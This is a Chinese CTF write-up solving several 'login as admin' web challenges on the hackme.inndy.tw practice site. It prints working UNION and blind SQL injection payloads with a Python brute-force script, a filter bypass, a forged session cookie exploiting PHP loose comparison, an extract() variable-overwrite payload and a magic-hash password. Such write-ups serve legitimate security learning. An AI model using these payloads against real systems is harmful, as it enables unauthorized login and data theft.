hackme.inndy.tw的19道web題解(中)
目錄
- 寫在前面
- ......
- login as admin 0
- Login as Admin 0.1
- login as admin 1.2
- login as admin 3
- login as admin 4
- login as admin 6
- login as admin 7
- 待續...
寫在前面
最近發現了一個比較有趣的ctf-oj,給出連結
https://hackme.inndy.tw/
裡面有不少web題,我這裡
因為依照出題人的要求:
本次文章不會直接給出flag,但是會有詳細的分析和攻擊指令碼
0x08 login as admin 0.1
admin' union select 1,2,3,4#
發現2會回顯
構造
admin' union select 1,database(),3,4#
資料庫名login_as_admin0
故此
admin' union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),3,4#
發現表名h1dden_f14g
admin' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x68316464656e5f66313467 limit 0,1),3,4#
發現欄位名the_f14g
admin' union select 1,(select the_f14g from h1dden_f14g limit 0,1),3,4#
拿到flag
0x09 Login as Admin 1
關注過濾
php
function safe_filter($str) { $strl = strtolower($str); if (strstr($strl, ' ') || strstr($strl, '1=1') || strstr($strl, "''") || strstr($strl, 'union select') || strstr($strl, 'select ') ) { return ''; } return str_replace("'", "\'", $str); }
多了個空格過濾,用/**/繞過即可,對於union select等過濾也十分不嚴謹,所以修改上題payload即可
admin'/**/or/**/1/**/limit/**/0,1#
即可
0x10 login as admin 1.2
這次union select不會回顯了,選擇盲注
但是太卡了……我就沒跑……大致指令碼如下,測試資料庫名正常
python
import requests
url = "https://hackme.inndy.tw/login1/index.php"
flag = ""
for i in range(1,100):
for j in range(33,127):
payload = "admin\'/**/or/**/(ascii(substr((select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1),%s,1))=%s)/**/limit/**/0,1#"%(i,j)
data = {
"name":payload,
"password":"1"
}
r = requests.post(url=url,data=data)
if "You are not admin!" in r.content:
flag += chr(j)
print flag
break
0x11 login as admin 3
關鍵程式碼
php
function load_user()
{
global $secret, $error;
if(empty($_COOKIE['user'])) {
return null;
}
$unserialized = json_decode(base64_decode($_COOKIE['user']), true);
$r = hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig'];
if(hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig']) {
$error = 'Invalid session';
return false;
}
$data = json_decode($unserialized['data'], true);
return [
'name' => $data[0],
'admin' => $data[1]
];
}
發現存在弱比較:
我們只要構造出sig=0即可輕鬆繞過訊息認證碼檢測:
hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig']
所以構造如下:
php
function set_user()
{
$user = ['admin',true];
$data = json_encode($user);
$sig = 0;
$all = base64_encode(json_encode(['sig' => $sig, 'data' => $data]));
echo $all;
}
set_user();
所以cookie裡新增user=eyJzaWciOjAsImRhdGEiOiJbXCJhZG1pblwiLHRydWVdIn0=重新整理即可得到flag
0x12 login as admin 4
程式碼邏輯問題,使用者名稱為admin直接可以成功
直接curl -d "name=admin" https://hackme.inndy.tw/login4/
即可獲取flag
0x13 login as admin 6
發現關鍵程式碼
php
if(!empty($_POST['data'])) {
try {
$data = json_decode($_POST['data'], true);
} catch (Exception $e) {
$data = [];
}
extract($data);
if($users[$username] && strcmp($users[$username], $password) == 0) {
$user = $username;
}
}
其中可以變數覆蓋:
extract($data);
所以我們構造:
data = {"users":{"admin":"sky"},"username":"admin","password":"sky"}
即可繞過,並且成功登陸
0x014 login as admin 7
0e開頭的md5弱比較
選擇:
name = admin
password = QNKCDZO
即可